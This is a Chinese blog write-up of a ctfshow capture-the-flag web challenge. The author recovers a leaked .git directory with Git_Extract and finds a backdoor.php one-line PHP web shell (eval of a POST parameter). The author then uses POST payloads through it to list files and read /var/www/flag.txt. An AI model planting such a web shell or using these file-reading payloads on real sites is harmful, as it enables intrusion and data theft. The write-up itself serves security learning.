ctfshow 红包题第七弹

最新推荐文章于 2024-04-21 14:35:59 发布
最新推荐文章于 2024-04-21 14:35:59 发布
阅读量491 收藏
点赞数
分类专栏: ctfshow 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_60378318/article/details/128826403
版权

Git_Extract进行扫描

python git_extract.py http://ab303c77-a623-4ab8-ad76-2992c7d35c50.challenge.ctf.show/.git/

然后 [huc-serverlow@parrot]─[~/Git_Extract-master]
└──╼ $cd ab303c77-a623-4ab8-ad76-2992c7d35c50.challenge.ctf.show

─[huc-serverlow@parrot]─[~/Git_Extract-master/ab303c77-a623-4ab8-ad76-2992c7d35c50.challenge.ctf.show]
└──╼ $cat backdoor.php
<!-- 36D姑娘留的后门,闲人免进 -->
<?php
        @eval($_POST['Letmein']);

 执行phpinfo();函数

 

查看当前文件夹

Letmein=print_r(glob('*'));

 

 得到flag

Letmein=highlight_file('/var/www/flag.txt');

 

 

小白猫咪
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
CTF之web安全基础
weixin_45574957的博客
03-15 1481
CTF WEB安全
【KaliLinux】————3、Git_Extract安装与使用
Fly_鹏程万里
08-17 4742
前言 .git泄露是一种常见的web安全漏洞,当一个网站存在git泄漏,攻击者可以通过git还原代码,从而获取网站源码等敏感文件。 .git泄露利用工具 项目地址:https://github.com/gakki429/Git_Extract 工具特点: 恢复项现包括: index 缓存 HEAD 现分支的恢复 logs/HEAD 日志 refs/stash 工作进度保...
ctfshow-web红包第七
最新发布
2202_75812594的博客
04-21 655
打开目首先就可以一个phpinfo(),找不到别的东西。1、目录扫描(不知道为什么我扫这一个就很慢,个/s,会疯)扫出来会发现很多,无疑就是存在。
Git-Extract
03-30
支持远程 .git 泄露的提取,也支持对本地 .git 路径下文件的提取;不使用 git 命令,完全使用 python 完成对 git 文件的解析;提取历史各版本的文件,并使用 filename.sha1[:6] 格式命名文件,以做区分 恢复项现包括: index 缓存 HEAD 现分支的恢复 logs/HEAD 日志 refs/stash 工作进度保存 refs/heads/master master 恢复 info/packs packs 文件提取恢复 refs/wip/index/refs/heads/master magit wip 模式 (PlaidCTF 2020) refs/wip/wtree/refs/heads/master
ctfshow-红包第七
XYH_233的博客
03-15 440
CTFshow
ctfshow-红包第五
m0_67507776的博客
04-19 807
1.下载压缩包,正常解压得到“《画》.mp3”,各种针对音频没有作用,上当,结束...... 2.本zip里面隐藏了一个图片,需要用foremost分离出来 3.使用steghide得到隐写flag.txt文本文件,密码是猜的123456 steghide info .\xx.jpg #检测文件 steghide extract -sf .\xx.jpg #分离文件 4.得到flag.txt aHR0cHM6Ly93d3cubGFuem91cy...
ctfshow 红包第九 ssrf
m0_46412682的博客
07-14 1080
开始的页面 随便输入一个username,好像是报错 burpsuit抓包 在输入username和密码那里好像有ssrf,输入一个http://www.baid.com,看它有没有返回百度的页面,有则存在ssrf漏洞,经测试是有的 虽然目提示PS:由于出现权限问,取消了mysql密码,端口还 原为3306,但是还是要试下file读取本地文件,看下有没flag.txt 经测试是没有的,那就按目的提示,ssrf攻击mysql,这里用到gopher协议和gopherus工具。 gopherus工具http
ctfshow web189 无单引号,利用回显不同,盲注
10-21
ctfshow web189 无单引号,利用回显不同,盲注
CTFSHOW web193 left标注盲注脚本
05-04
这段代码是一个用于获取某个网站的 flag 的脚本。它使用了 SQL 注入漏洞来获取 flag。具体来说,它通过构造 SQL 语句的方式,逐个字符地获取 flag。其中,它通过修改注入语句中的 payload 变量,来获取不同的信息,...
GitHack-master
02-13
git源码泄露利用工具,`.git` 泄漏利用工具,可还原历史版本,不需要安装其它 Python 库,只需要有 git 命令
git-master
04-12
git源代码,可以查看git相关的操作代码。
git-extract:从 Git 存储库中提取文件或文件夹
06-17
从 Git 存储库中提取文件或文件夹。 例子 $ extract server.js creaturephil/alpha $ ls server.js 安装 $ npm install -g git-extract 用法 Usage: extract [file | folder] [repositories] Commands: * extract files or folders from a Git repository Options: -h, --help output usage information -V, --version output the version number 执照
ctfshow web214 时间盲注标准脚本
10-21
ctfshow web214 时间盲注标准脚本
ctfshow web139命令盲注脚本
10-21
ctfshow靶场 web入门 web139 命令盲注脚本
CTFSHOW web183 正则爆破脚本
10-21
CTFSHOW web183 正则爆破脚本
ctfshow-web-红包第七
HAI_WD的博客
08-27 273
发现一个.git文件403,这种情况通常都是存在文件夹,但是不能直接访问文件夹导致的。那么我们可以使用git_extract工具进行获取内容。蚁剑连接一下,发现无法下载文件,disable_functions会限制一些内容。那么直接使用蚁剑插件进行绕过即可。首先上来访问就是phpinfo。常规思路先扫一下目录。wx公众号,发送关键字 git 获取。git_extract工具可以搜索。发现一个backdoor.php文件。
CTFshow--web--红包第七
weixin_45908624的博客
01-29 447
ctfshow--web--红包第七
[CTFshow 红包挑战] 红包挑战7 Write up
Leaf_initial的博客
08-14 293
extract() 函数从数组中将变量导入到当前的符号表。该函数使用数组键名作为变量名,使用数组键值作为变量值。针对数组中的每个元素,将在当前符号表中创建对应的一个变量。第二个参数type用于指定当某个变量已经存在,而数组中又有同名元素时,extract() 函数如何对待这样的冲突。该函数返回成功导入到符号表中的变量数目。简单来说就是他可以接受我们的。
ctfshow web 红包第二
08-16
根据提供的引用内容,这道红包的目标是找到flag。在源代码中,我们可以看到一个GET参数cmd,它可以用来执行命令。然后,在引用中,我们可以看到一个POST请求,其中cmd参数被设置为`. /??p/p?p??????`,这可能是一个命令路径。通过修改POST请求,我们可以尝试找到flag.txt文件。根据引用中的内容,根目录下有flag.txt文件,因此我们可以尝试执行`ls /`命令来列出根目录中的文件。请记住,这是一个漏洞目,仅用于学习和研究目的,不要在未授权的情况下尝试攻击他人的服务器。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* [CTFshow--web--红包第二](https://blog.csdn.net/weixin_45908624/article/details/128786662)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 50%"] - *3* [CTFSHOW 红包第二](https://blog.csdn.net/qq_46091464/article/details/107954930)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值